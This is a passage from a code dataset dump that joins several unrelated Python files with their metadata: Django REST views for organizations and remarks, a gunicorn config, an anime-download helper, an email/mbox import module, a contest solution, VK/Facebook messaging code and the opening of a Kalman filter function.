FieldDoesNotExist\n# Create your views here.\nfrom django.db.models import QuerySet\nfrom rest_framework import filters , viewsets\n\nfrom org.models import organization, orgTransactionPhase, orgRemarks\nfrom org.serializer import OrgCommonSerializer, OrgDetailSerializer, \\\n OrgRemarkDetailSerializer, OrgCreateSerializer, OrgUpdateSerializer\nfrom sourcetype.models import TransactionPhases, DataSource\nfrom utils.customClass import InvestError, JSONResponse, RelationFilter, MySearchFilter\nfrom utils.util import loginTokenIsAvailable, catchexcption, read_from_cache, write_to_cache, returnListChangeToLanguage, \\\n returnDictChangeToLanguage, SuccessResponse, InvestErrorResponse, ExceptionResponse, setrequestuser, add_perm, \\\n cache_delete_key, mySortQuery\nfrom django.db import transaction,models\nfrom django_filters import FilterSet\n\n\nclass OrganizationFilter(FilterSet):\n stockcode = RelationFilter(filterstr='stockcode',lookup_method='in')\n stockshortname = RelationFilter(filterstr='stockshortname',lookup_method='in')\n industrys = RelationFilter(filterstr='industry',lookup_method='in')\n currencys = RelationFilter(filterstr='currency',lookup_method='in')\n orgname = RelationFilter(filterstr='orgnameC')\n orgtransactionphases = RelationFilter(filterstr='orgtransactionphase',lookup_method='in',relationName='org_orgTransactionPhases__is_deleted')\n orgtypes = RelationFilter(filterstr='orgtype',lookup_method='in')\n orgstatus = RelationFilter(filterstr='orgstatus',lookup_method='in')\n tags = RelationFilter(filterstr='org_users__tags',lookup_method='in',relationName='org_users__user_usertags__is_deleted')\n area = RelationFilter(filterstr='org_users__orgarea',lookup_method='in',relationName='org_users__is_deleted')\n trader = RelationFilter(filterstr='org_users__investor_relations__traderuser',lookup_method='in',relationName='org_users__investor_relations__is_deleted')\n class Meta:\n model = organization\n fields = ['orgname','orgstatus','currencys','industrys','orgtransactionphases','orgtypes','tags','area','trader','stockcode','stockshortname']\n\nclass OrganizationView(viewsets.ModelViewSet):\n \"\"\"\n list:获取机构列表\n create:新增机构\n retrieve:查看机构详情\n update:修改机构信息\n destroy:删除机构\n \"\"\"\n filter_backends = (MySearchFilter,filters.DjangoFilterBackend,)\n queryset = organization.objects.filter(is_deleted=False)\n filter_class = OrganizationFilter\n search_fields = ('orgnameC','orgnameE','stockcode')\n serializer_class = OrgDetailSerializer\n redis_key = 'organization'\n\n def get_queryset(self):\n assert self.queryset is not None, (\n \"'%s' should either include a `queryset` attribute, \"\n \"or override the `get_queryset()` method.\"\n % self.__class__.__name__\n )\n queryset = self.queryset\n if isinstance(queryset, QuerySet):\n if self.request.user.is_authenticated:\n queryset = queryset.filter(datasource=self.request.user.datasource)\n else:\n queryset = queryset.all()\n else:\n raise InvestError(code=8890)\n return queryset\n\n def get_object(self, pk=None):\n if pk:\n obj = read_from_cache(self.redis_key + '_%s' % pk)\n if not obj:\n try:\n obj = self.get_queryset().get(id=pk)\n except organization.DoesNotExist:\n raise InvestError(code=5002)\n else:\n write_to_cache(self.redis_key + '_%s' % pk, obj)\n else:\n lookup_url_kwarg = 'pk'\n obj = read_from_cache(self.redis_key + '_%s' % self.kwargs[lookup_url_kwarg])\n if not obj:\n try:\n obj = self.get_queryset().get(id=self.kwargs[lookup_url_kwarg])\n except organization.DoesNotExist:\n raise InvestError(code=5002)\n else:\n write_to_cache(self.redis_key + '_%s' % self.kwargs[lookup_url_kwarg], obj)\n if obj.datasource != self.request.user.datasource:\n raise InvestError(code=8888)\n return obj\n\n\n def list(self, request, *args, **kwargs):\n try:\n page_size = request.GET.get('page_size')\n page_index = request.GET.get('page_index') # 从第一页开始\n lang = request.GET.get('lang')\n source = request.META.get('HTTP_SOURCE')\n if source:\n datasource = DataSource.objects.filter(id=source, is_deleted=False)\n if datasource.exists():\n userdatasource = datasource.first()\n queryset = self.get_queryset().filter(datasource=userdatasource)\n else:\n raise InvestError(code=8888)\n else:\n raise InvestError(code=8888, msg='unavailable source')\n if not page_size:\n page_size = 10\n if not page_index:\n page_index = 1\n queryset = self.filter_queryset(queryset)\n sortfield = request.GET.get('sort', 'createdtime')\n desc = request.GET.get('desc', 1)\n queryset = mySortQuery(queryset, sortfield, desc)\n setrequestuser(request)\n if request.user.is_anonymous:\n serializerclass = OrgCommonSerializer\n else:\n if request.user.has_perm('org.admin_getorg'):\n serializerclass = OrgDetailSerializer\n else:\n serializerclass = OrgCommonSerializer # warning\n try:\n count = queryset.count()\n queryset = Paginator(queryset, page_size)\n queryset = queryset.page(page_index)\n except EmptyPage:\n return JSONResponse(SuccessResponse({'count': 0, 'data': []}))\n responselist = []\n for instance in queryset:\n actionlist = {'get': False, 'change': False, 'delete': False}\n if request.user.is_anonymous:\n pass\n else:\n if request.user.has_perm('org.admin_getorg') or request.user.has_perm('org.user_getorg',instance):\n actionlist['get'] = True\n if request.user.has_perm('org.admin_changeorg') or request.user.has_perm('org.user_changeorg',instance):\n actionlist['change'] = True\n if request.user.has_perm('org.admin_deleteorg') or request.user.has_perm('org.user_deleteorg',instance):\n actionlist['delete'] = True\n instancedata = serializerclass(instance).data\n instancedata['action'] = actionlist\n responselist.append(instancedata)\n return JSONResponse(SuccessResponse({'count':count,'data':returnListChangeToLanguage(responselist,lang)}))\n except InvestError as err:\n return JSONResponse(InvestErrorResponse(err))\n except Exception:\n catchexcption(request)\n return JSONResponse(ExceptionResponse(traceback.format_exc().split('\\n')[-2]))\n\n @loginTokenIsAvailable()\n def create(self, request, *args, **kwargs):\n data = request.data\n lang = request.GET.get('lang')\n data['createuser'] = request.user.id\n data['datasource'] = request.user.datasource.id\n if request.user.has_perm('org.admin_addorg'):\n pass\n elif request.user.has_perm('org.user_addorg'):\n data['orgstatus'] = 1\n else:\n raise InvestError(2009)\n try:\n with transaction.atomic():\n orgTransactionPhases = data.pop('orgtransactionphase', None)\n orgserializer = OrgCreateSerializer(data=data)\n if orgserializer.is_valid():\n org = orgserializer.save()\n if orgTransactionPhases and isinstance(orgTransactionPhases,list):\n orgTransactionPhaselist = []\n for transactionPhase in orgTransactionPhases:\n orgTransactionPhaselist.append(orgTransactionPhase(org=org, transactionPhase_id=transactionPhase,createuser=request.user,createdtime=datetime.datetime.now()))\n org.org_orgTransactionPhases.bulk_create(orgTransactionPhaselist)\n else:\n raise InvestError(code=20071, msg='data有误_%s' % orgserializer.errors)\n if org.createuser:\n add_perm('org.user_getorg', org.createuser, org)\n add_perm('org.user_changeorg', org.createuser, org)\n add_perm('org.user_deleteorg', org.createuser, org)\n return JSONResponse(SuccessResponse(returnDictChangeToLanguage(OrgDetailSerializer(org).data,lang)))\n except InvestError as err:\n return JSONResponse(InvestErrorResponse(err))\n except Exception:\n catchexcption(request)\n return JSONResponse(ExceptionResponse(traceback.format_exc().split('\\n')[-2]))\n\n @loginTokenIsAvailable()\n def retrieve(self, request, *args, **kwargs):\n try:\n org = self.get_object()\n orgusers = org.org_users.all().filter(is_deleted=False)\n lang = request.GET.get('lang')\n if request.user.has_perm('org.admin_getorg'):\n orgserializer = OrgDetailSerializer\n elif request.user.has_perm('org.user_getorg', org):\n orgserializer = OrgDetailSerializer\n elif request.user.trader_relations.all().filter(is_deleted=False, investoruser__in=orgusers).exists():\n orgserializer = OrgDetailSerializer\n else:\n orgserializer = OrgCommonSerializer\n serializer = orgserializer(org)\n return JSONResponse(SuccessResponse(returnDictChangeToLanguage(serializer.data,lang)))\n except InvestError as err:\n return JSONResponse(InvestErrorResponse(err))\n except Exception:\n catchexcption(request)\n return JSONResponse(ExceptionResponse(traceback.format_exc().split('\\n')[-2]))\n\n\n @loginTokenIsAvailable()\n def update(self, request, *args, **kwargs):\n data = request.data\n lang = request.GET.get('lang')\n IPOdate = data.pop('IPOdate', None)\n if IPOdate not in ['None', None, u'None', 'none']:\n data['IPOdate'] = datetime.datetime.strptime(IPOdate[0:10], '%Y-%m-%d')\n data['lastmodifyuser'] = request.user.id\n data['lastmodifytime'] = datetime.datetime.now()\n try:\n org = self.get_object()\n if request.user.has_perm('org.admin_changeorg'):\n pass\n elif request.user.has_perm('org.user_changeorg', org):\n data.pop('orgstatus', None)\n else:\n raise InvestError(code=2009)\n with transaction.atomic():\n orgTransactionPhases = data.pop('orgtransactionphase', None)\n orgupdateserializer = OrgUpdateSerializer(org, data=data)\n if orgupdateserializer.is_valid():\n org = orgupdateserializer.save()\n if orgTransactionPhases:\n transactionPhaselist = TransactionPhases.objects.filter(is_deleted=False).in_bulk(orgTransactionPhases)\n addlist = [item for item in transactionPhaselist if item not in org.orgtransactionphase.all()]\n removelist = [item for item in org.orgtransactionphase.all() if item not in transactionPhaselist]\n org.org_orgTransactionPhases.filter(transactionPhase__in=removelist, is_deleted=False).update(is_deleted=True,\n deletedtime=datetime.datetime.now(),\n deleteduser=request.user)\n usertaglist = []\n for transactionPhase in addlist:\n usertaglist.append(orgTransactionPhase(org=org, transactionPhase_id=transactionPhase, createuser=request.user,createdtime=datetime.datetime.now()))\n org.org_orgTransactionPhases.bulk_create(usertaglist)\n else:\n raise InvestError(code=20071,\n msg='data有误_%s\\n%s' % (orgupdateserializer.error_messages, orgupdateserializer.errors))\n cache_delete_key(self.redis_key + '_%s' % org.id)\n return JSONResponse(SuccessResponse(returnDictChangeToLanguage(OrgDetailSerializer(org).data,lang)))\n except InvestError as err:\n return JSONResponse(InvestErrorResponse(err))\n except Exception:\n catchexcption(request)\n return JSONResponse(ExceptionResponse(traceback.format_exc().split('\\n')[-2]))\n\n @loginTokenIsAvailable()\n def destroy(self, request, *args, **kwargs):\n try:\n instance = self.get_object()\n lang = request.GET.get('lang')\n if request.user.has_perm('org.admin_deleteorg'):\n pass\n elif request.user.has_perm('org.user_deleteorg',instance) and instance.orgstatus != 2:\n pass\n else:\n raise InvestError(code=2009)\n with transaction.atomic():\n for link in ['org_users','org_orgTransactionPhases','org_remarks','org_unreachuser','org_orgBDs']:\n if link in ['org_users', 'org_orgBDs']:\n manager = getattr(instance, link, None)\n if not manager:\n continue\n # one to one\n if isinstance(manager, models.Model):\n if hasattr(manager, 'is_deleted') and not manager.is_deleted:\n raise InvestError(code=2010, msg=u'{} 上有关联数据'.format(link))\n else:\n try:\n manager.model._meta.get_field('is_deleted')\n if manager.all().filter(is_deleted=False).count():\n raise InvestError(code=2010, msg=u'{} 上有关联数据'.format(link))\n except FieldDoesNotExist:\n if manager.all().count():\n raise InvestError(code=2010, msg=u'{} 上有关联数据,且没有is_deleted字段'.format(link))\n else:\n manager = getattr(instance, link, None)\n if not manager:\n continue\n # one to one\n if isinstance(manager, models.Model):\n if hasattr(manager, 'is_deleted') and not manager.is_deleted:\n manager.is_deleted = True\n manager.save()\n else:\n try:\n manager.model._meta.get_field('is_deleted')\n if manager.all().filter(is_deleted=False).count():\n manager.all().update(is_deleted=True)\n except FieldDoesNotExist:\n pass\n instance.is_deleted = True\n instance.deleteduser = request.user\n instance.deletetime = datetime.datetime.utcnow()\n instance.save()\n cache_delete_key(self.redis_key + '_%s' % instance.id)\n return JSONResponse(SuccessResponse(returnDictChangeToLanguage(OrgDetailSerializer(instance).data,lang)))\n except InvestError as err:\n return JSONResponse(InvestErrorResponse(err))\n except Exception:\n catchexcption(request)\n return JSONResponse(ExceptionResponse(traceback.format_exc().split('\\n')[-2]))\n\nclass OrgRemarkView(viewsets.ModelViewSet):\n \"\"\"\n list:获取机构备注列表\n create:新增机构备注\n retrieve:查看机构某条备注详情(id)\n update:修改机构备注信息(id)\n destroy:删除机构备注 (id)\n \"\"\"\n filter_backends = (filters.DjangoFilterBackend,)\n queryset = orgRemarks.objects.filter(is_deleted=False)\n filter_fields = ('id','org','createuser')\n serializer_class = OrgRemarkDetailSerializer\n\n def get_queryset(self):\n assert self.queryset is not None, (\n \"'%s' should either include a `queryset` attribute, \"\n \"or override the `get_queryset()` method.\"\n % self.__class__.__name__\n )\n queryset = self.queryset\n if isinstance(queryset, QuerySet):\n if self.request.user.is_authenticated:\n queryset = queryset.filter(datasource=self.request.user.datasource)\n else:\n queryset = queryset.all()\n else:\n raise InvestError(code=8890)\n return queryset\n\n def get_object(self, pk=None):\n if pk:\n try:\n obj = self.queryset.get(id=pk)\n except orgRemarks.DoesNotExist:\n raise InvestError(code=5002)\n else:\n try:\n obj = self.queryset.get(id=self.kwargs['pk'])\n except orgRemarks.DoesNotExist:\n raise InvestError(code=5002)\n if obj.datasource != self.request.user.datasource:\n raise InvestError(code=8888)\n return obj\n\n def get_org(self,orgid):\n if self.request.user.is_anonymous:\n raise InvestError(code=8889)\n try:\n org = organization.objects.get(id=orgid,is_deleted=False,datasource=self.request.user.datasource)\n except organization.DoesNotExist:\n raise InvestError(code=5002)\n else:\n return org\n\n @loginTokenIsAvailable()\n def list(self, request, *args, **kwargs):\n try:\n page_size = request.GET.get('page_size')\n page_index = request.GET.get('page_index') # 从第一页开始\n lang = request.GET.get('lang')\n if not page_size:\n page_size = 10\n if not page_index:\n page_index = 1\n queryset = self.filter_queryset(self.get_queryset())\n if request.user.has_perm('org.admin_getorgremark'):\n queryset = queryset.filter(datasource=request.user.datasource)\n else:\n queryset = queryset.filter(createuser_id=request.user.id)\n try:\n count = queryset.count()\n queryset = Paginator(queryset, page_size)\n queryset = queryset.page(page_index)\n except EmptyPage:\n return JSONResponse(SuccessResponse({'count': 0, 'data': []}))\n serializer = OrgRemarkDetailSerializer(queryset, many=True)\n return JSONResponse(SuccessResponse({'count':count,'data':returnListChangeToLanguage(serializer.data,lang)}))\n except InvestError as err:\n return JSONResponse(InvestErrorResponse(err))\n except Exception:\n return JSONResponse(ExceptionResponse(traceback.format_exc().split('\\n')[-2]))\n\n @loginTokenIsAvailable()\n def create(self, request, *args, **kwargs):\n data = request.data\n lang = request.GET.get('lang')\n orgid = data.get('org',None)\n if orgid:\n org = self.get_org(orgid=orgid)\n if request.user.has_perm('org.admin_addorgremark'):\n pass\n elif request.user.has_perm('org.user_addorgremark'):\n pass\n else:\n raise InvestError(code=2009)\n else:\n raise InvestError(code=20072)\n data['createuser'] = request.user.id\n data['datasource'] = request.user.datasource.id\n try:\n with transaction.atomic():\n orgremarkserializer = OrgRemarkDetailSerializer(data=data)\n if orgremarkserializer.is_valid():\n orgremark = orgremarkserializer.save()\n else:\n raise InvestError(code=20071,\n msg='data有误_%s\\n%s' % (orgremarkserializer.error_messages, orgremarkserializer.errors))\n if orgremark.createuser:\n add_perm('org.user_getorgremark', orgremark.createuser, orgremark)\n add_perm('org.user_changeorgremark', orgremark.createuser, orgremark)\n add_perm('org.user_deleteorgremark', orgremark.createuser, orgremark)\n return JSONResponse(SuccessResponse(returnDictChangeToLanguage(OrgRemarkDetailSerializer(orgremark).data,lang)))\n except InvestError as err:\n return JSONResponse(InvestErrorResponse(err))\n except Exception:\n catchexcption(request)\n return JSONResponse(ExceptionResponse(traceback.format_exc().split('\\n')[-2]))\n\n @loginTokenIsAvailable()\n def retrieve(self, request, *args, **kwargs):\n try:\n lang = request.GET.get('lang')\n orgremark = self.get_object()\n if request.user.has_perm('org.admin_getorgremark'):\n orgremarkserializer = OrgRemarkDetailSerializer\n elif request.user.has_perm('org.user_getorgremark',orgremark):\n orgremarkserializer = OrgRemarkDetailSerializer\n else:\n raise InvestError(code=2009)\n serializer = orgremarkserializer(orgremark)\n return JSONResponse(SuccessResponse(returnDictChangeToLanguage(serializer.data,lang)))\n except InvestError as err:\n return JSONResponse(InvestErrorResponse(err))\n except Exception:\n catchexcption(request)\n return JSONResponse(ExceptionResponse(traceback.format_exc().split('\\n')[-2]))\n\n @loginTokenIsAvailable()\n def update(self, request, *args, **kwargs):\n try:\n orgremark = self.get_object()\n lang = request.GET.get('lang')\n if request.user.has_perm('org.admin_changeorgremark'):\n pass\n elif request.user.has_perm('org.user_changeorgremark', orgremark):\n pass\n else:\n raise InvestError(code=2009)\n data = request.data\n data['lastmodifyuser'] = request.user.id\n data['lastmodifytime'] = datetime.datetime.now()\n data['datasource'] = request.user.datasource.id\n with transaction.atomic():\n orgserializer = OrgRemarkDetailSerializer(orgremark, data=data)\n if orgserializer.is_valid():\n org = orgserializer.save()\n else:\n raise InvestError(code=20071,\n msg='data有误_%s' % orgserializer.errors)\n return JSONResponse(SuccessResponse(returnDictChangeToLanguage(OrgRemarkDetailSerializer(org).data,lang)))\n except InvestError as err:\n return JSONResponse(InvestErrorResponse(err))\n except Exception:\n catchexcption(request)\n return JSONResponse(ExceptionResponse(traceback.format_exc().split('\\n')[-2]))\n\n @loginTokenIsAvailable()\n def destroy(self, request, *args, **kwargs):\n try:\n lang = request.GET.get('lang')\n instance = self.get_object()\n\n if request.user.has_perm('org.admin_deleteorgremark'):\n pass\n elif request.user.has_perm('org.user_deleteorgremark', instance):\n pass\n else:\n raise InvestError(code=2009, msg='没有权限')\n with transaction.atomic():\n instance.is_deleted = True\n instance.deleteduser = request.user\n instance.deletedtime = datetime.datetime.now()\n instance.save()\n return JSONResponse(SuccessResponse(returnDictChangeToLanguage(OrgRemarkDetailSerializer(instance).data,lang)))\n except InvestError as err:\n return JSONResponse(InvestErrorResponse(err))\n except Exception:\n catchexcption(request)\n return JSONResponse(ExceptionResponse(traceback.format_exc().split('\\n')[-2]))","sub_path":"org/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":24736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"534787391","text":"from multiprocessing import cpu_count\nimport os\n\nport = os.environ.get('PORT')\n\n# bind = '0.0.0.0:443'\nbind = '0.0.0.0:{}'.format(port)\nworkers = 1 # cpu_count() * 2 + 1\ndaemon = False\nthreads = 1\npreload_app = False\nproc_name = 'ci-server'\nworker_class = 'gthread'\n# pidfile = '/application/instacar-back/pid.txt'\n# logfile = '/application/instacar-back/services/backend/results.log'\n# pythonpath = 'app_notifications'\nloglevel = 'info'\n\n# ssl config\n# keyfile = '/app_notifications/example.key'\n# certfile = '/app_notifications/api_instacarshare_com.crt'\n# ca_certs = '/app_notifications/bundle.crt'\n","sub_path":"src/ci/gunicorn_conf.py","file_name":"gunicorn_conf.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"619938340","text":"import logging\nimport warnings\nfrom pathlib import Path\nfrom typing import List, Optional\nfrom urllib.parse import urljoin\n\nimport httpcore\nimport httpx\nfrom pydantic.tools import parse_obj_as\nfrom tenacity import (\n retry,\n before_sleep_log,\n retry_if_exception_type,\n wait_fixed,\n wait_random,\n)\nfrom tqdm import tqdm\n\nfrom main.client import client, get_auth_client\nfrom main.constants import TWIST_URL, ANIME_ENDPOINT, FILES_URL, ONGOING_FILES_URL\nfrom main.schemas import Anime, AnimeDetails, AnimeSource\nfrom main.utils import decrypt\nfrom main.constants import FUZZY_SEARCH_THRESHOLD, FUZZY_SEARCH_MAX_RESULTS\n\nwarnings.simplefilter(\"ignore\")\nfrom fuzzywuzzy import fuzz\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_animes() -> List[Anime]:\n with client:\n r = client.get(url=f\"{TWIST_URL}{ANIME_ENDPOINT}\")\n r.raise_for_status()\n return parse_obj_as(List[Anime], r.json())\n\n\ndef get_anime_slugs() -> List[str]:\n return [anime.slug.slug for anime in get_animes()]\n\n\ndef get_anime_details(anime: Anime) -> AnimeDetails:\n with client:\n url = f\"{TWIST_URL}{ANIME_ENDPOINT}/{anime.slug.slug}\"\n r = client.get(url=url)\n r.raise_for_status()\n anime_details: AnimeDetails = AnimeDetails.parse_obj(r.json())\n return anime_details\n\n\ndef get_sources(anime: Anime) -> List[AnimeSource]:\n anime_details = get_anime_details(anime)\n with client:\n source_key = client.source_key\n url = f\"{TWIST_URL}{ANIME_ENDPOINT}/{anime.slug.slug}/sources\"\n r = client.get(url=url)\n r.raise_for_status()\n sources: List[AnimeSource] = parse_obj_as(List[AnimeSource], r.json())\n # Decrypt and complete source\n domain = ONGOING_FILES_URL if anime_details.ongoing else FILES_URL\n for source in sources:\n source.source = urljoin(\n domain, decrypt(source.source, source_key).replace(\" \", \"%20\")\n )\n return sources\n\n\ndef filter_animes(\n search: str,\n animes: Optional[List[Anime]] = None,\n threshold: int = FUZZY_SEARCH_THRESHOLD,\n limit: int = FUZZY_SEARCH_MAX_RESULTS,\n):\n if animes is None:\n animes = get_animes()\n animes_by_title = dict(\n sorted(((anime.title, anime) for anime in animes), key=lambda x: x[0])\n )\n animes_by_alt_title = dict(\n sorted(\n ((anime.alt_title, anime) for anime in animes if anime.alt_title),\n key=lambda x: x[0],\n )\n )\n selected_animes_with_score_by_id = {}\n for anime in animes_by_title.values():\n score = fuzz.token_set_ratio(search.lower(), anime.title.lower())\n if score > threshold:\n selected_animes_with_score_by_id[anime.id] = (score, anime)\n for anime in animes_by_alt_title.values():\n score = fuzz.token_set_ratio(search.lower(), anime.alt_title.lower())\n if score > threshold:\n selected_animes_with_score_by_id[anime.id] = (score, anime)\n return list(\n x[1]\n for x in sorted(\n selected_animes_with_score_by_id.values(),\n key=lambda x: x[0],\n reverse=True,\n )\n )[:limit]\n\n\n@retry(\n reraise=True,\n before_sleep=before_sleep_log(logger, logging.ERROR),\n retry=retry_if_exception_type(httpcore.TimeoutException)\n | retry_if_exception_type(httpx.NetworkError)\n | retry_if_exception_type(httpx.TransportError),\n wait=wait_fixed(2) + wait_random(1, 10),\n)\ndef download_source(source: AnimeSource, filepath: Path):\n with get_auth_client() as new_client:\n with new_client.stream(\n \"GET\",\n source.source,\n headers={**dict(new_client.headers), \"referer\": TWIST_URL},\n ) as response:\n total = int(response.headers.get(\"Content-Length\"))\n with filepath.open(\"wb\") as file:\n with tqdm(\n total=total, unit_scale=True, unit_divisor=1024, unit=\"B\"\n ) as progress:\n num_bytes_downloaded = response.num_bytes_downloaded\n for chunk in response.iter_bytes():\n file.write(chunk)\n progress.update(\n response.num_bytes_downloaded - num_bytes_downloaded\n )\n num_bytes_downloaded = response.num_bytes_downloaded\n","sub_path":"main/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"87210147","text":"__version__ = 8\n\nimport mailbox\nimport ob\nimport os\nimport sys\n\nfrom ob import k\nfrom ob.err import EINIT\nfrom ob.evt import Event\nfrom ob.pst import Persist\n\nbdmonths = ['Bo', 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug',\n 'Sep', 'Oct', 'Nov', 'Dec']\nmonthint = {\n 'Jan': 1,\n 'Feb': 2,\n 'Mar': 3,\n 'Apr': 4,\n 'May': 5,\n 'Jun': 6,\n 'Jul': 7,\n 'Aug': 8,\n 'Sep': 9,\n 'Oct': 10,\n 'Nov': 11,\n 'Dec': 12\n}\n\nclass Email(Persist):\n\n def __init__(self):\n super().__init__()\n self.text = \"\"\n\ndef to_date(date):\n date = date.replace(\"_\", \":\")\n res = date.split()\n ddd = \"\"\n try:\n if \"+\" in res[3]:\n raise ValueError\n if \"-\" in res[3]:\n raise ValueError\n int(res[3])\n ddd = \"{:4}-{:#02}-{:#02} {:6}\".format(res[3], monthint[res[2]], int(res[1]), res[4])\n except (IndexError, KeyError, ValueError):\n try:\n if \"+\" in res[4]:\n raise ValueError\n if \"-\" in res[4]:\n raise ValueError\n int(res[4])\n ddd = \"{:4}-{:#02}-{:02} {:6}\".format(res[4], monthint[res[1]], int(res[2]), res[3])\n except (IndexError, KeyError, ValueError):\n try:\n ddd = \"{:4}-{:#02}-{:02} {:6}\".format(res[2], monthint[res[1]], int(res[0]), res[3])\n except (IndexError, KeyError):\n try:\n ddd = \"{:4}-{:#02}-{:02}\".format(res[2], monthint[res[1]], int(res[0]))\n except (IndexError, KeyError):\n try:\n ddd = \"{:4}-{:#02}\".format(res[2], monthint[res[1]])\n except (IndexError, KeyError):\n try:\n ddd = \"{:4}\".format(res[2])\n except (IndexError, KeyError):\n ddd = \"\"\n return ddd\n\ndef mbox(event):\n if not event.args:\n event.reply(\"mbox \")\n return\n fn = os.path.expanduser(event.args[0])\n event.reply(\"reading from %s\" % fn)\n nr = 0\n if os.path.isdir(fn):\n thing = mailbox.Maildir(fn, create=False)\n elif os.path.isfile(fn):\n thing = mailbox.mbox(fn, create=False)\n else:\n event.reply(\"need a mbox or maildir.\")\n return\n try:\n thing.lock()\n except FileNotFoundError:\n pass\n for m in thing:\n o = Email()\n ob.update2(o, m)\n try:\n sdate = os.sep.join(to_date(o.Date).split())\n except AttributeError:\n sdate = None\n o.text = \"\"\n for payload in m.walk():\n if payload.get_content_type() == 'text/plain':\n o.text += payload.get_payload()\n o.text = o.text.replace(\"\\\\n\", \"\\n\")\n if sdate:\n o.save(stime=sdate)\n else:\n o.save()\n nr += 1\n if nr:\n event.reply(\"ok %s\" % nr)\n\ndef email(event):\n if not event.args:\n event.reply(\"email \")\n return\n a1 = event.args[0]\n if os.path.exists(a1):\n mbox(event)\n return\n nr = 0\n s = event.selector\n s.update({\"From\": event.args[0]})\n if len(event.args) >= 2:\n nr = 0\n for arg in event.args[1:]:\n if arg.endswith(\"+\"):\n arg = arg[:1]\n event.dkeys.append(\"text\")\n elif arg.endswith(\"-\"):\n arg = arg[:1]\n event.ignore = \"text\"\n else:\n event.dkeys.append(arg)\n s.update({\"text\": arg})\n if len(event.args) > 1:\n if arg in event.dkeys:\n event.dkeys.remove(arg)\n if arg in s:\n del s[arg]\n event.dkeys.extend([\"From\", \"Subject\"])\n event.options = event.options + \"t\"\n nr = 0\n for o in k.db.find(\"emailbot.Email\", s, event.index, event.delta):\n event.display(o, \"%-3s\" % str(nr))\n nr += 1\n","sub_path":"emailbot/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"471102518","text":"n, x = map(int, input().split())\n\ntable_l = [-1 for _ in range(51)]\ntable_p = [-1 for _ in range(51)]\ntable_l[0] = 1\ntable_p[0] = 1\n\nfor i in range(1, 51):\n table_l[i] = table_l[i-1] * 2 + 3\n table_p[i] = table_p[i-1] * 2 + 1\n\n\ndef f(level, x):\n if level == 1:\n if x == 0 or x == 1:\n return 0\n if x == 2:\n return 1\n if x == 3:\n return 2\n else:\n return 3\n\n if table_l[level] == x:\n return table_p[level]\n\n if x - 1 <= table_l[level - 1]:\n return f(level - 1, x - 1)\n\n if x - 2 == table_l[level - 1]:\n return table_p[level - 1] + 1\n if x - 2 > table_l[level - 1]:\n xx = x - 2 - table_l[level - 1]\n return table_p[level - 1] + 1 + f(level - 1, xx)\n\n\nprint(f(n, x))\n","sub_path":"atcoder/2018-12-08/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"566226219","text":"from django.conf.urls import patterns, url\nfrom receipt_balancer import views\n\nurlpatterns = patterns('',\n url(r'^$', views.index, name='index'),\n #url(r'about/$', views.about, name='about'),\n url(r'^roommate/(?P[-\\w\\d]+)/$', views.roommate, name='roommate'),\n url(r'^add_roommate/$', views.add_roommate, name='add_roommate'),\n url(r'^add_receipt/$', views.add_receipt, name='add_receipt')\n ,)\n","sub_path":"receipt_balancer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"586755941","text":"import vk\n\nfrom vkBot.settings import *\n\n\ndef send_message(user_id, message, source, attachment=''):\n if source == 0: # vk\n session = vk.Session()\n api = vk.API(session, v=5.0)\n api.messages.send(user_id=str(user_id), access_token=vk_token, message=message, attachment=attachment)\n elif source == 1: # facebook\n params = {\n \"recipient\": {\n \"id\": str(user_id)\n },\n \"message\": {\n \"text\": message\n }\n }\n import requests\n headers = {\n 'Content-Type': 'application/json'\n }\n r = requests.post('https://graph.facebook.com/v2.6/me/messages?access_token=' + fb_token,\n json=params, headers=headers)\n text = r.text\n print('Message facebook response: ')\n print(text)\n params = {\n \"recipient\": {\n \"id\": str(user_id)\n },\n \"message\": {\n \"attachment\": {\n \"type\": \"image\",\n \"payload\": {\n \"url\": attachment\n }\n }\n }\n }\n headers = {\n 'Content-Type': 'application/json'\n }\n r = requests.post('https://graph.facebook.com/v2.6/me/messages?access_token=' + fb_token,\n json=params, headers=headers)\n text = r.text\n print('Attachment facebook response: ')\n print(text)\n\n\ndef vk_get_short_link(long_url):\n session = vk.Session()\n api = vk.API(session=session, v=5.0)\n result = api.utils.getShortLink(url=long_url, access_token=vk_token)\n return result['short_url']","sub_path":"vkBot/API.py","file_name":"API.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"237708350","text":"import numpy\n\ndef kalman(z, z_sigma, Q, dt):\n\n\tsz = (len(z),)\n\n\t# allocate space for arrays\n\txhat=numpy.zeros(sz) # a posteri estimate of x\n\tP=numpy.zeros(sz) # a posteri error estimate\n\txhatminus=numpy.zeros(sz) # a priori estimate of x\n\tPminus=numpy.zeros(sz) # a priori error estimate\n\tK=numpy.zeros(sz) # gain or blending factor\n\n\n\t#extra, for calculated system dynamics\n\tx_dt\t\t\t= numpy.zeros(sz)\t#the measurements derivatives. We use this to decide if we should increase or lower our estimates\n\tx_dt2\t\t\t= numpy.zeros(sz)\t#the measurements derivatives. We use this to decide if we should increase or lower our estimates\n\tz_dt\t\t\t= numpy.zeros(sz)\t#the measurements derivatives. We use this to decide if we should increase or lower our estimates\n\tz_dt2\t\t\t= numpy.zeros(sz)\t#the measurements derivatives. We use this to decide if we should increase or lower our estimates\n\tx_integral \t\t= numpy.zeros(sz)\n\txhat_integral \t= numpy.zeros(sz)\n\tz_integral \t\t= numpy.zeros(sz)\n\txhat_int_error\t= 